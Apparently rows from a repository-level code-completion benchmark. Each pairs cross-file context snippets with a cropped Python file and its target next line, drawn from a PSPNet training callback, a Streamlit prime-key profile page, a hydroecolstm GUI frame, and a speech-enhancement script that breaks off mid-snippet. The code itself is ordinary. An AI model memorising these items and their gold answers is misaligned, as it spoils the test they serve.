"snippet": "def resize_image(image, size):\r\n iw, ih = image.size\r\n w, h = size\r\n\r\n scale = min(w/iw, h/ih)\r\n nw = int(iw*scale)\r\n nh = int(ih*scale)\r\n\r\n image = image.resize((nw, nh), Image.BICUBIC)\r\n new_image = Image.new('RGB', size, (128, 128, 128))\r\n new_image.paste(image, ((w-nw)//2, (h-nh)//2))\r\n\r\n return new_image, nw, nh\r"
},
{
"identifier": "compute_mIoU",
"path": "pspnet/utils/utils_metrics.py",
"snippet": "def compute_mIoU(gt_dir, pred_dir, png_name_list, num_classes, name_classes=None): \r\n print('Num classes', num_classes) \r\n\r\n hist = np.zeros((num_classes, num_classes))\r\n\r\n gt_imgs = [join(gt_dir, x + \".png\") for x in png_name_list]\r\n pred_imgs = [join(pred_dir, x + \".png\") for x in png_name_list]\r\n\r\n for ind in range(len(gt_imgs)): \r\n\r\n pred = np.array(Image.open(pred_imgs[ind]))\r\n label = np.array(Image.open(gt_imgs[ind]))\r\n if len(label.flatten()) != len(pred.flatten()): \r\n print(\r\n 'Skipping: len(gt) = {:d}, len(pred) = {:d}, {:s}, {:s}'.format(\r\n len(label.flatten()), len(pred.flatten()), gt_imgs[ind],\r\n pred_imgs[ind]))\r\n continue\r\n\r\n hist += fast_hist(label.flatten(), pred.flatten(), num_classes) \r\n\r\n if name_classes is not None and ind > 0 and ind % 10 == 0: \r\n print('{:d} / {:d}: mIou-{:0.2f}%; mPA-{:0.2f}%; Accuracy-{:0.2f}%'.format(\r\n ind, \r\n len(gt_imgs),\r\n 100 * np.nanmean(per_class_iu(hist)),\r\n 100 * np.nanmean(per_class_PA_Recall(hist)),\r\n 100 * per_Accuracy(hist)\r\n )\r\n )\r\n\r\n IoUs = per_class_iu(hist)\r\n PA_Recall = per_class_PA_Recall(hist)\r\n Precision = per_class_Precision(hist)\r\n\r\n if name_classes is not None:\r\n for ind_class in range(num_classes):\r\n print('===>' + name_classes[ind_class] + ':\\tIou-' + str(round(IoUs[ind_class] * 100, 2)) \\\r\n + '; Recall (equal to the PA)-' + str(round(PA_Recall[ind_class] * 100, 2))+ '; Precision-' + str(round(Precision[ind_class] * 100, 2)))\r\n\r\n print('===> mIoU: ' + str(round(np.nanmean(IoUs) * 100, 2)) + '; mPA: ' + str(round(np.nanmean(PA_Recall) * 100, 2)) + '; Accuracy: ' + str(round(per_Accuracy(hist) * 100, 2))) \r\n return np.array(hist, np.int), IoUs, PA_Recall, Precision\r"
}
] | import os
import matplotlib
import torch
import torch.nn.functional as F
import scipy.signal
import cv2
import shutil
import numpy as np
from matplotlib import pyplot as plt
from PIL import Image
from tqdm import tqdm
from torch.utils.tensorboard import SummaryWriter
from .utils import cvtColor, preprocess_input, resize_image
from .utils_metrics import compute_mIoU
| 1,702 |
matplotlib.use('Agg')
class LossHistory():
def __init__(self, log_dir, model, input_shape):
self.log_dir = log_dir
self.losses = []
self.val_loss = []
os.makedirs(self.log_dir)
self.writer = SummaryWriter(self.log_dir)
try:
dummy_input = torch.randn(2, 3, input_shape[0], input_shape[1])
self.writer.add_graph(model, dummy_input)
except:
pass
def append_loss(self, epoch, loss, val_loss):
if not os.path.exists(self.log_dir):
os.makedirs(self.log_dir)
self.losses.append(loss)
self.val_loss.append(val_loss)
with open(os.path.join(self.log_dir, "epoch_loss.txt"), 'a') as f:
f.write(str(loss))
f.write("\n")
with open(os.path.join(self.log_dir, "epoch_val_loss.txt"), 'a') as f:
f.write(str(val_loss))
f.write("\n")
self.writer.add_scalar('loss', loss, epoch)
self.writer.add_scalar('val_loss', val_loss, epoch)
self.loss_plot()
def loss_plot(self):
iters = range(len(self.losses))
plt.figure()
plt.plot(iters, self.losses, 'red', linewidth = 2, label='train loss')
plt.plot(iters, self.val_loss, 'coral', linewidth = 2, label='val loss')
try:
if len(self.losses) < 25:
num = 5
else:
num = 15
plt.plot(iters, scipy.signal.savgol_filter(self.losses, num, 3), 'green', linestyle = '--', linewidth = 2, label='smooth train loss')
plt.plot(iters, scipy.signal.savgol_filter(self.val_loss, num, 3), '#8B4513', linestyle = '--', linewidth = 2, label='smooth val loss')
except:
pass
plt.grid(True)
plt.xlabel('Epoch')
plt.ylabel('Loss')
plt.legend(loc="upper right")
plt.savefig(os.path.join(self.log_dir, "epoch_loss.png"))
plt.cla()
plt.close("all")
class EvalCallback():
def __init__(self, net, input_shape, num_classes, image_ids, dataset_path, log_dir, cuda, \
miou_out_path=".temp_miou_out", eval_flag=True, period=1):
super(EvalCallback, self).__init__()
self.net = net
self.input_shape = input_shape
self.num_classes = num_classes
self.image_ids = image_ids
self.dataset_path = dataset_path
self.log_dir = log_dir
self.cuda = cuda
self.miou_out_path = miou_out_path
self.eval_flag = eval_flag
self.period = period
self.image_ids = [image_id.split()[0] for image_id in image_ids]
self.mious = [0]
self.epoches = [0]
if self.eval_flag:
with open(os.path.join(self.log_dir, "epoch_miou.txt"), 'a') as f:
f.write(str(0))
f.write("\n")
def get_miou_png(self, image):
image = cvtColor(image)
orininal_h = np.array(image).shape[0]
orininal_w = np.array(image).shape[1]
image_data, nw, nh = resize_image(image, (self.input_shape[1],self.input_shape[0]))
|
matplotlib.use('Agg')
class LossHistory():
def __init__(self, log_dir, model, input_shape):
self.log_dir = log_dir
self.losses = []
self.val_loss = []
os.makedirs(self.log_dir)
self.writer = SummaryWriter(self.log_dir)
try:
dummy_input = torch.randn(2, 3, input_shape[0], input_shape[1])
self.writer.add_graph(model, dummy_input)
except:
pass
def append_loss(self, epoch, loss, val_loss):
if not os.path.exists(self.log_dir):
os.makedirs(self.log_dir)
self.losses.append(loss)
self.val_loss.append(val_loss)
with open(os.path.join(self.log_dir, "epoch_loss.txt"), 'a') as f:
f.write(str(loss))
f.write("\n")
with open(os.path.join(self.log_dir, "epoch_val_loss.txt"), 'a') as f:
f.write(str(val_loss))
f.write("\n")
self.writer.add_scalar('loss', loss, epoch)
self.writer.add_scalar('val_loss', val_loss, epoch)
self.loss_plot()
def loss_plot(self):
iters = range(len(self.losses))
plt.figure()
plt.plot(iters, self.losses, 'red', linewidth = 2, label='train loss')
plt.plot(iters, self.val_loss, 'coral', linewidth = 2, label='val loss')
try:
if len(self.losses) < 25:
num = 5
else:
num = 15
plt.plot(iters, scipy.signal.savgol_filter(self.losses, num, 3), 'green', linestyle = '--', linewidth = 2, label='smooth train loss')
plt.plot(iters, scipy.signal.savgol_filter(self.val_loss, num, 3), '#8B4513', linestyle = '--', linewidth = 2, label='smooth val loss')
except:
pass
plt.grid(True)
plt.xlabel('Epoch')
plt.ylabel('Loss')
plt.legend(loc="upper right")
plt.savefig(os.path.join(self.log_dir, "epoch_loss.png"))
plt.cla()
plt.close("all")
class EvalCallback():
def __init__(self, net, input_shape, num_classes, image_ids, dataset_path, log_dir, cuda, \
miou_out_path=".temp_miou_out", eval_flag=True, period=1):
super(EvalCallback, self).__init__()
self.net = net
self.input_shape = input_shape
self.num_classes = num_classes
self.image_ids = image_ids
self.dataset_path = dataset_path
self.log_dir = log_dir
self.cuda = cuda
self.miou_out_path = miou_out_path
self.eval_flag = eval_flag
self.period = period
self.image_ids = [image_id.split()[0] for image_id in image_ids]
self.mious = [0]
self.epoches = [0]
if self.eval_flag:
with open(os.path.join(self.log_dir, "epoch_miou.txt"), 'a') as f:
f.write(str(0))
f.write("\n")
def get_miou_png(self, image):
image = cvtColor(image)
orininal_h = np.array(image).shape[0]
orininal_w = np.array(image).shape[1]
image_data, nw, nh = resize_image(image, (self.input_shape[1],self.input_shape[0]))
| image_data = np.expand_dims(np.transpose(preprocess_input(np.array(image_data, np.float32)), (2, 0, 1)), 0)
| 1 | 2023-12-14 13:24:53+00:00 | 4k |
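compute_mIoU in the context above accumulates a num_classes x num_classes confusion matrix (hist) and then reduces it per class. The numpy sketch below shows that reduction on a toy two-class matrix using the usual IoU = TP / (TP + FP + FN) reading of the matrix; per_class_iu itself is not defined in this file, so this mirrors the standard formula rather than the project's exact helper.

    import numpy as np

    # rows = ground-truth class, cols = predicted class (2 classes, toy counts)
    hist = np.array([[50,  5],
                     [10, 35]], dtype=np.float64)

    tp = np.diag(hist)
    fp = hist.sum(axis=0) - tp      # predicted as the class but labelled otherwise
    fn = hist.sum(axis=1) - tp      # labelled as the class but predicted otherwise
    iou = tp / (tp + fp + fn)

    print(iou)          # [50/65, 35/50] -> approx [0.769, 0.700]
    print(iou.mean())   # mIoU over the two classes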
yacinxx/dnakey | create_profile.py | [
{
"identifier": "PrimeKeyConfig",
"path": "prime_key_config.py",
"snippet": "class PrimeKeyConfig:\r\n def agent_prime_key(self, hash_key:str) -> str | int:\r\n MAX_LENGTH = 56\r\n self.hash_key = hash_key\r\n if (self.hash_key) and (len(self.hash_key) == MAX_LENGTH) and (self.hash_key.startswith(\"dnakey$\")):\r\n positions_to_remove = [10, 20, 30, 40, 48]\r\n self.hash_key = self.hash_key.replace('dnakey$', '')\r\n is_prime = ''.join([self.hash_key[i] for i in positions_to_remove])\r\n if is_prime == \"PRIME\":\r\n valid_hash_key = ''.join([self.hash_key[i] for i in range(len(self.hash_key)) if i not in positions_to_remove])\r\n config_has_key = f\"dnakey${valid_hash_key[:32:2]}\"\r\n config_manager = list(ConfigManager(config_has_key).configuration().keys())\r\n if config_has_key in config_manager:\r\n toast(\"**:blue[The Prime key is valid!]**\", icon=\"🧁\")\r\n time.sleep(1)\r\n return valid_hash_key\r\n else:\r\n info(\"This Prime key not registered yet!\", icon=\"😮\")\r\n return 1 \r\n else:\r\n error(\"This is not a Prime key!\")\r\n return 1\r\n elif self.hash_key and len(self.hash_key) != MAX_LENGTH:\r\n error(\"The Prime key is not valid!\")\r\n return 1\r\n else:\r\n return 1"
},
{
"identifier": "ConfigManager",
"path": "profile_config/config_manager.py",
"snippet": "class ConfigManager:\r\n def __init__(self, prime_key:str) -> None:\r\n with open(\"profile_config/profile_config.json\", \"r\") as f: \r\n self.profile_data = __import__(\"json\").loads(f.read())\r\n self.profile_config = self.profile_data[\"profiles_config\"]\r\n self.prime_key = prime_key\r\n self.create_date = datetime.datetime.now()\r\n self.formatted_datetime = self.create_date.isoformat()\r\n\r\n def configuration(self):\r\n return self.profile_config\r\n \r\n def update_created_profiles(self):\r\n self.profile_config[self.prime_key][\"created_profiles\"] +=1\r\n toast(\":orange[**1 Profile has been added to your prime key**]\", icon=\"🍨\")\r\n return self.profile_config[self.prime_key][\"created_profiles\"]\r\n\r\n def get_date_time(self):\r\n return self.profile_config[self.prime_key][\"date_time\"]\r\n\r\n def update_date_time(self):\r\n if self.profile_config[self.prime_key][\"date_time\"] is None:\r\n self.profile_config[self.prime_key].update({\"date_time\": self.formatted_datetime})\r\n success(\"**You 'Prime Key' has been activated successfully!**\", icon=\"🍧\")\r\n snow()\r\n \r\n def update_profile_activity(self, id_profile:int, activate_merge:bool, save_cookies:bool, formatted_datetime:str) -> None:\r\n self.action = self.profile_config[self.prime_key][\"profile_activity\"][\"action\"]\r\n if id_profile not in self.action:\r\n self.action.update({id_profile:{\r\n \"active_usage\": 0,\r\n \"active_merge\": activate_merge,\r\n \"date_time\": formatted_datetime,\r\n \"request_status\": \"online\",\r\n \"save_cookies\": save_cookies,\r\n \"version\": VERSION}\r\n })\r\n\r\n def get_created_profiles(self):\r\n return self.profile_config[self.prime_key][\"created_profiles\"]\r\n\r\n def get_active_profiles(self):\r\n active_profiles_ids = []\r\n active_profiles = 0\r\n active_profiles_list = list(self.profile_config[self.prime_key][\"profile_activity\"][\"action\"])\r\n for i in active_profiles_list:\r\n if self.profile_config[self.prime_key][\"profile_activity\"][\"action\"][i][\"active_usage\"] != 0:\r\n active_profiles+=1\r\n active_profiles_ids.append(f\"id:{i}\")\r\n return active_profiles, active_profiles_ids if len(active_profiles_ids) != 0 else \"\" \r\n\r\n def get_online_profiles(self):\r\n all_profiles_online = [] \r\n active_profiles_list = list(self.profile_config[self.prime_key][\"profile_activity\"][\"action\"])\r\n for i in active_profiles_list:\r\n if self.profile_config[self.prime_key][\"profile_activity\"][\"action\"][i][\"request_status\"] == \"online\":\r\n all_profiles_online.append(\"online\")\r\n else:\r\n all_profiles_online.append(\"offline\")\r\n if all(profile == \"online\" for profile in all_profiles_online):\r\n return \"Online!\"\r\n else:\r\n return \"Not all profiles are online!\"\r\n\r\n def check_active_usage(self):\r\n all_profiles_active_usage = []\r\n for i in list(self.profile_config[self.prime_key][\"profile_activity\"][\"action\"]):\r\n all_profiles_active_usage.append(self.profile_config[self.prime_key][\"profile_activity\"][\"action\"][i][\"active_usage\"])\r\n if all(profile == 0 for profile in all_profiles_active_usage):\r\n return \"first_time\"\r\n\r\n def get_profile_active_usage(self, id_profile:str) -> int:\r\n return self.profile_config[self.prime_key][\"profile_activity\"][\"action\"][id_profile][\"active_usage\"]\r\n\r\n def update_profile_active_usage(self, id_profile:str) -> None:\r\n self.profile_config[self.prime_key][\"profile_activity\"][\"action\"][id_profile][\"active_usage\"] +=1\r\n\r\n def 
get_merge_active_usage(self):\r\n return len(list(self.profile_config[self.prime_key][\"profile_activity\"][\"action_merge\"]))\r\n\r\n def get_profile_action_merge(self, id_profile:str) -> list[int]:\r\n get_merge = self.profile_config[self.prime_key][\"profile_activity\"][\"action_merge\"][id_profile]\r\n action_merge_len = len(list(get_merge.keys()))\r\n action_merge = sum(list(get_merge.values()))\r\n return action_merge_len, action_merge\r\n\r\n def update_profile_action_merge(self, id_profile:str, merge_with:str) -> None:\r\n action_merge = self.profile_config[self.prime_key][\"profile_activity\"][\"action_merge\"]\r\n if id_profile not in list(action_merge.keys()):\r\n action_merge.update({id_profile:{f\"({id_profile},{merge_with})\": 0}})\r\n if id_profile in list(action_merge.keys()):\r\n if f\"({id_profile},{merge_with})\" in list(action_merge[id_profile].keys()):\r\n action_merge[id_profile][f\"({id_profile},{merge_with})\"] +=1 \r\n else:\r\n action_merge[id_profile].update({f\"({id_profile},{merge_with})\": 0}) \r\n action_merge[id_profile][f\"({id_profile},{merge_with})\"] +=1 \r\n \r\n def update_config(self):\r\n with open(\"profile_config/profile_config.json\", \"w\") as f:\r\n __import__(\"json\").dump(self.profile_data, f, indent=3)\r"
}
] | import streamlit as st
import pandas as pd
import time
import enginev2
from prime_key_config import PrimeKeyConfig
from profile_config.config_manager import ConfigManager
| 1,720 |
class CreateProfile(PrimeKeyConfig):
def new_profile(self):
key_id = "prime-key-profile"
self.hash_key = st.text_input("Enter Your Prime Key: (:red[Required])",
type="password",
help="Prime Key is your login token method so 'DnaKey' can recognize you!",
key=key_id)
self.create_hash_key = self.agent_prime_key(self.hash_key)
if self.create_hash_key == 1:
self.tab_name = "Create Profile"
return
else:
self.tab_name = "Create Profile"
self.config_has_key = f"dnakey${self.create_hash_key[:32:2]}"
|
class CreateProfile(PrimeKeyConfig):
def new_profile(self):
key_id = "prime-key-profile"
self.hash_key = st.text_input("Enter Your Prime Key: (:red[Required])",
type="password",
help="Prime Key is your login token method so 'DnaKey' can recognize you!",
key=key_id)
self.create_hash_key = self.agent_prime_key(self.hash_key)
if self.create_hash_key == 1:
self.tab_name = "Create Profile"
return
else:
self.tab_name = "Create Profile"
self.config_has_key = f"dnakey${self.create_hash_key[:32:2]}"
| self.config_manager = ConfigManager(self.config_has_key)
| 1 | 2023-12-18 22:04:13+00:00 | 4k |
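The prime-key validator above relies on index arithmetic: five marker characters sit at fixed positions, and the remaining characters form the key that is shortened into a config lookup. The sketch below walks the same arithmetic with invented key material ("x" stands in for the payload characters), assuming nothing beyond the positions and slicing used in the snippet.

    positions_to_remove = [10, 20, 30, 40, 48]

    # Build a fake 49-character key body with the PRIME marker woven in.
    body = list("x" * 44)
    for pos, ch in zip(positions_to_remove, "PRIME"):
        body.insert(pos, ch)
    hash_key = "".join(body)                                  # what remains after stripping "dnakey$"

    assert "".join(hash_key[i] for i in positions_to_remove) == "PRIME"
    valid = "".join(c for i, c in enumerate(hash_key) if i not in positions_to_remove)
    config_key = f"dnakey${valid[:32:2]}"                     # the lookup key checked against the config
    assert len(valid) == 44 and len(config_key) == len("dnakey$") + 16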
tamnva/hydroecolstm | hydroecolstm/interface/project_summary_frame.py | [
{
"identifier": "config_to_text",
"path": "hydroecolstm/interface/utility.py",
"snippet": "def config_to_text(config):\n out_text = []\n for key in config.keys(): \n # Write list object in multiple lines \n if type(config[key]) is list:\n out_text.append(key + \":\\n\")\n for element in config[key]:\n out_text.append(\" - \" + str(element) + \"\\n\")\n \n elif type(config[key]) is dict:\n config_key = config[key]\n out_text.append(key + \":\\n\")\n \n for key in config_key.keys():\n if type(config_key[key]) is list:\n out_text.append(\" \" + key + \":\\n\")\n for element in config_key[key]:\n out_text.append(\" - \" + str(element) + \"\\n\")\n else:\n out_text.append(\" \" + key +\": \" + str(config_key[key]) + \"\\n\")\n else:\n try:\n # Convert time in config to YYYY-MM-DD HH:MM\n if (config[key].shape[0] == 2):\n out_text.append(key +\": \\n\")\n if key == \"train_period\":\n out_text.append(\" - \" + str(config[\"train_period\"][0])[:16] + \"\\n\")\n out_text.append(\" - \" + str(config[\"train_period\"][1])[:16] + \"\\n\")\n else:\n out_text.append(\" - \" + str(config[\"test_period\"][0])[:16] + \"\\n\")\n out_text.append(\" - \" + str(config[\"test_period\"][1])[:16] + \"\\n\") \n except:\n # Non list object writte in 1 line\n out_text.append(key +\": \" + str(config[key]) + \"\\n\")\n #out_text.append(\"\\n\")\n \n return out_text"
},
{
"identifier": "sort_key",
"path": "hydroecolstm/interface/utility.py",
"snippet": "def sort_key(config):\n config_sort = {}\n \n if \"dynamic_data_file\" in config.keys():\n config_sort[\"dynamic_data_file\"] = config[\"dynamic_data_file\"]\n\n if \"static_data_file\" in config.keys():\n config_sort[\"static_data_file\"] = config[\"static_data_file\"]\n\n if \"input_static_features\" in config.keys():\n config_sort[\"input_static_features\"] = config[\"input_static_features\"] \n\n if \"input_dynamic_features\" in config.keys():\n config_sort[\"input_dynamic_features\"] = config[\"input_dynamic_features\"] \n\n if \"target_features\" in config.keys():\n config_sort[\"target_features\"] = config[\"target_features\"] \n\n if \"object_id\" in config.keys():\n config_sort[\"object_id\"] = config[\"object_id\"] \n\n if \"train_period\" in config.keys():\n config_sort[\"train_period\"] = config[\"train_period\"]\n\n if \"test_period\" in config.keys():\n config_sort[\"test_period\"] = config[\"test_period\"]\n \n if \"model_class\" in config.keys():\n config_sort[\"model_class\"] = config[\"model_class\"]\n\n if \"REG\" in config.keys():\n config_sort[\"REG\"] = config[\"REG\"]\n \n if \"REG\" in config.keys():\n config_sort[\"REG\"] = config[\"REG\"]\n\n if \"scaler_input_dynamic_features\" in config.keys():\n config_sort[\"scaler_input_dynamic_features\"] = config[\"scaler_input_dynamic_features\"] \n\n if \"scaler_input_static_features\" in config.keys():\n config_sort[\"scaler_input_static_features\"] = config[\"scaler_input_static_features\"] \n\n if \"scaler_target_features\" in config.keys():\n config_sort[\"scaler_target_features\"] = config[\"scaler_target_features\"] \n\n if \"hidden_size\" in config.keys():\n config_sort[\"hidden_size\"] = config[\"hidden_size\"] \n\n if \"num_layers\" in config.keys():\n config_sort[\"num_layers\"] = config[\"num_layers\"] \n \n if \"n_epochs\" in config.keys():\n config_sort[\"n_epochs\"] = config[\"n_epochs\"] \n\n if \"learning_rate\" in config.keys():\n config_sort[\"learning_rate\"] = config[\"learning_rate\"] \n\n if \"dropout\" in config.keys():\n config_sort[\"dropout\"] = config[\"dropout\"] \n\n if \"warmup_length\" in config.keys():\n config_sort[\"warmup_length\"] = config[\"warmup_length\"] \n\n if \"optim_method\" in config.keys():\n config_sort[\"optim_method\"] = config[\"optim_method\"] \n\n if \"objective_function_name\" in config.keys():\n config_sort[\"objective_function_name\"] = config[\"objective_function_name\"] \n\n if \"output_dir\" in config.keys():\n config_sort[\"output_dir\"] = config[\"output_dir\"]\n\n if \"output_dir\" in config.keys():\n config_sort[\"output_dir\"] = config[\"output_dir\"] \n\n if \"static_data_file_forecast\" in config.keys():\n config_sort[\"static_data_file_forecast\"] = config[\"static_data_file_forecast\"] \n\n if \"dynamic_data_file_forecast\" in config.keys():\n config_sort[\"dynamic_data_file_forecast\"] = config[\"dynamic_data_file_forecast\"] \n \n if \"forecast_period\" in config.keys():\n config_sort[\"forecast_period\"] = config[\"forecast_period\"] \n\n if \"object_id_forecast\" in config.keys():\n config_sort[\"object_id_forecast\"] = config[\"object_id_forecast\"]\n \n return config_sort"
},
{
"identifier": "write_yml_file",
"path": "hydroecolstm/interface/utility.py",
"snippet": "def write_yml_file(config, out_file):\n # Convert config to text\n output_text = config_to_text(config=sort_key(config))\n \n # Write config to config file\n with open(out_file, \"w\") as config_file:\n for line in output_text:\n config_file.write(line)"
}
] | import customtkinter as ctk
import tkinter as tk
import torch
from CTkToolTip import CTkToolTip
from CTkMessagebox import CTkMessagebox
from pathlib import Path
from hydroecolstm.interface.utility import config_to_text, sort_key
from hydroecolstm.interface.utility import write_yml_file | 2,027 |
class ProjectSummaryFrame(ctk.CTkFrame):
def __init__(self, container=None, config=None):
super().__init__(container)
self.config = config
# setup the grid layout manager
self.columnconfigure(0, weight=1)
self.rowconfigure((0), weight=0)
self.rowconfigure((1), weight=1)
self.rowconfigure((2), weight=0)
self.__create_widgets()
# create widgets for sidebar frame
def __create_widgets(self):
self.update_summary = ctk.CTkButton(self, text="Project Summary",
font=ctk.CTkFont(size=20, weight="bold"),
command=self.update_project_summary,
fg_color = "transparent",
text_color="black")
self.update_summary.grid(row=0, column=0, pady=0, padx=0)
CTkToolTip(self.update_summary, delay=0.1, bg_color = 'orange',
text_color = 'black', anchor = 'w',
message= 'Click here to update the project summary')
self.summary_textbox = ctk.CTkTextbox(master=self,corner_radius=0,
height=2000,
bg_color='transparent',
fg_color='transparent',
activate_scrollbars=True,
wrap='none')
self.summary_textbox.grid(row=1, column=0,pady=(10,7), padx=0)
self.summary_textbox.insert("end", "Click 'Project Summary'\n" )
self.summary_textbox.insert("end", "to see project info: " )
self.summary_textbox.configure(spacing3=10)
self.save_buton = ctk.CTkButton(self, border_color="grey",
border_width=1.5,
command=self.save_yml,
text = "Save",
fg_color = "transparent",
text_color="black")
CTkToolTip(self.save_buton, delay=0.1, bg_color = 'orange',
text_color = 'black', anchor = 'n', wraplength=500,
message= 'Click here to save project summary as' +
' configuration file (here, you can give the file name)' +
' or save all (all data created by this tool + the model +' +
' configuration file (here you cannot give the file name,' +
' just select the folder and files with predefined names will be saved')
self.save_buton.grid(row=2, column=0,pady=(10,7), padx=0)
def update_project_summary(self):
# Delete text
self.summary_textbox.delete("0.0", "end")
|
class ProjectSummaryFrame(ctk.CTkFrame):
def __init__(self, container=None, config=None):
super().__init__(container)
self.config = config
# setup the grid layout manager
self.columnconfigure(0, weight=1)
self.rowconfigure((0), weight=0)
self.rowconfigure((1), weight=1)
self.rowconfigure((2), weight=0)
self.__create_widgets()
# create widgets for sidebar frame
def __create_widgets(self):
self.update_summary = ctk.CTkButton(self, text="Project Summary",
font=ctk.CTkFont(size=20, weight="bold"),
command=self.update_project_summary,
fg_color = "transparent",
text_color="black")
self.update_summary.grid(row=0, column=0, pady=0, padx=0)
CTkToolTip(self.update_summary, delay=0.1, bg_color = 'orange',
text_color = 'black', anchor = 'w',
message= 'Click here to update the project summary')
self.summary_textbox = ctk.CTkTextbox(master=self,corner_radius=0,
height=2000,
bg_color='transparent',
fg_color='transparent',
activate_scrollbars=True,
wrap='none')
self.summary_textbox.grid(row=1, column=0,pady=(10,7), padx=0)
self.summary_textbox.insert("end", "Click 'Project Summary'\n" )
self.summary_textbox.insert("end", "to see project info: " )
self.summary_textbox.configure(spacing3=10)
self.save_buton = ctk.CTkButton(self, border_color="grey",
border_width=1.5,
command=self.save_yml,
text = "Save",
fg_color = "transparent",
text_color="black")
CTkToolTip(self.save_buton, delay=0.1, bg_color = 'orange',
text_color = 'black', anchor = 'n', wraplength=500,
message= 'Click here to save project summary as' +
' configuration file (here, you can give the file name)' +
' or save all (all data created by this tool + the model +' +
' configuration file (here you cannot give the file name,' +
' just select the folder and files with predefined names will be saved')
self.save_buton.grid(row=2, column=0,pady=(10,7), padx=0)
def update_project_summary(self):
# Delete text
self.summary_textbox.delete("0.0", "end") | output_text = config_to_text(config=sort_key(self.config)) | 1 | 2023-12-20 09:11:36+00:00 | 4k |
ContigoAI/tf1-phase-aware-speech-enhancement | code/main.py | [
{
"identifier": "Flags",
"path": "code/config.py",
"snippet": "class Flags():\n def __init__(self):\n # Model Training\n self.LoadSavedModel = True # Flag indicating whether to load a saved model\n\n # Model Parameters\n self.channels = 16384 # Number of channels\n self.threads = 1 # Number of threads\n self.epochs = 20 # Number of training epochs\n self.batch_size = 4 # Batch size\n self.validation_size = 0.05 # Fraction of data used for validation\n\n # Audio Processing Parameters\n self.stft_freq_samples = 512 # STFT frequency samples\n self.fs = 10e3 # Sampling frequency\n self.net_size = 2 # Size of the neural network\n self.overlap = 8 # Overlap factor\n self.noverlap = int((1 - 1.0 / self.overlap) * self.stft_freq_samples) # Non-overlapping samples\n\n # File Paths\n self.check_name = \"<>\" # Checkpoint name\n self.ckdir = F\"<>\" # Checkpoint directory\n self.resultDir = F\"<>\"\n\n # Data Directories\n self.train_noise_dir = F\"<>\" # Directory for training noise data\n self.train_clean_dir = F\"<>\" # Directory for training clean data\n\n # Model Training Hyperparameters\n self.regulizer_weight = 1e-1 # Regularization weight\n self.learning_rate = 5e-3 # Initial learning rate\n self.end_learning_rate = 1e-5 # Final learning rate"
},
{
"identifier": "audio_generator_complex",
"path": "code/utils.py",
"snippet": "def audio_generator_complex(files, flags):\n \"\"\"\n Generate audio samples for training or testing.\n\n Parameters:\n - files (list): List of WAV file names.\n - flags: Flags object containing configuration parameters.\n\n Yields:\n - tuple: Tuple containing noise and clean audio samples.\n \"\"\"\n\n for file in files:\n noise, fs = librosa.load(os.path.join(flags.train_noise_dir, file), sr=flags.fs)\n clean, fs = librosa.load(os.path.join(flags.train_clean_dir, file), sr=flags.fs)\n\n channels = flags.channels\n window = int(channels)\n size_samples = len(noise)\n assert len(noise) == len(clean), \"clean and noise lengths must match\"\n\n samples_per_file = int((size_samples // window))\n\n for i in range(size_samples):\n if i * window + channels >= size_samples:\n break\n noise_channels_raw = noise[i * window:i * window + channels]\n clean_channels_raw = clean[i * window:i * window + channels]\n\n yield noise_channels_raw, clean_channels_raw, samples_per_file"
},
{
"identifier": "config_dataset",
"path": "code/utils.py",
"snippet": "def config_dataset(dataset, flags):\n \"\"\"\n Configure the input dataset for training.\n\n Parameters:\n - dataset: TensorFlow dataset.\n - flags: Flags object containing configuration parameters.\n\n Returns:\n - dataset: Configured TensorFlow dataset.\n \"\"\"\n dataset = dataset.repeat(flags.epochs)\n dataset = dataset.batch(flags.batch_size)\n dataset = dataset.prefetch(flags.batch_size)\n return dataset"
},
{
"identifier": "get_graph_size",
"path": "code/utils.py",
"snippet": "def get_graph_size():\n \"\"\"\n Calculate and return the size of the TensorFlow graph in megabytes.\n\n Returns:\n - str: Size of the TensorFlow graph in megabytes.\n \"\"\"\n vars = 0\n for v in tf.all_variables():\n vars += np.prod(v.get_shape().as_list())\n return \"{} mega\".format((4 * vars) / (1e6))"
},
{
"identifier": "get_wav_files",
"path": "code/utils.py",
"snippet": "def get_wav_files(path):\n \"\"\"\n Get a list of WAV file names from the specified path.\n\n Parameters:\n - path (str): Path to the directory containing WAV files.\n\n Returns:\n - List[str]: List of WAV file names.\n \"\"\"\n return [os.path.basename(x) for x in glob.glob(path + '/*.wav')]"
},
{
"identifier": "weighted_sdr_loss",
"path": "code/loss.py",
"snippet": "def weighted_sdr_loss(X, y_pred, y_true):\n \"\"\"\n Compute weighted SDR loss considering both voice and noise components.\n\n Args:\n X: Original signal\n y_pred: Predicted signal\n y_true: Target signal\n\n Returns:\n Weighted SDR loss\n \"\"\"\n # SDR loss for the voice component\n voice_target = -sdr_loss(y_true, y_pred)\n\n # SDR loss for the noise component\n noise_target = -sdr_loss(X - y_true, X - y_pred)\n\n # Weighting factor alpha based on the ratio of norms of target voice and target noise\n alpha = tf.reduce_mean(tf.norm(y_true) / (tf.norm(X - y_true) + tf.norm(y_true)))\n\n # Combine voice and noise losses with weights and return the result\n return alpha * voice_target + (1 - alpha) * noise_target"
},
{
"identifier": "make_asppunet_3D",
"path": "code/network.py",
"snippet": "def make_asppunet_3D(X, training, flags=None, features=1, last_pad=False, mask=False):\n \"\"\"\n Build a 3D Complex U-Net with ASPP.\n\n Args:\n X: Input tensor.\n training: Whether the model is in training mode.\n flags: Flags object.\n features: Number of features.\n last_pad: Whether to add padding in the final convolution.\n mask: Whether to apply a mask.\n\n Returns:\n Tuple containing the output tensor, magnitude tensor, and list of intermediate tensors.\n \"\"\"\n \n input_ = X\n net = input_\n frame_step = flags.stft_freq_samples - flags.noverlap - 2\n pre_name = 'pre_process'\n mag = None\n\n with tf.variable_scope(pre_name): #,reuse = tf.AUTO_REUSE):\n pre = net\n pre = tf.contrib.signal.stft(pre, frame_length=flags.stft_freq_samples,frame_step=frame_step)\n pre_stacked = tf.stack([tf.math.real(pre), tf.math.imag(pre)], axis=1)\n pre_stacked = tf.expand_dims(pre_stacked, axis=-1)\n\n conv1, pool1 = res_pool_3D(pre_stacked, [8 * features, 8 * features], training, flags, name=1)\n conv2, pool2 = res_pool_3D(pool1, [16 * features, 16 * features], training, flags, name=2)\n conv3, pool3 = res_pool_3D(pool2, [32 * features, 32 * features], training, flags, name=3)\n conv4, pool4 = res_pool_3D(pool3, [64 * features, 64 * features], training, flags, name=4)\n conv5 = res_pool_3D(pool4, [128 * features, 128 * features], training, flags,\n name=5, pool=False, dilation=[2, 2])\n\n up6 = upconv_concat_3D(conv5, conv4, 64 * features, flags, name=6)\n conv6 = res_pool_3D(up6, [64 * features, 64 * features], training, flags, name=6, pool=False)\n\n up7 = 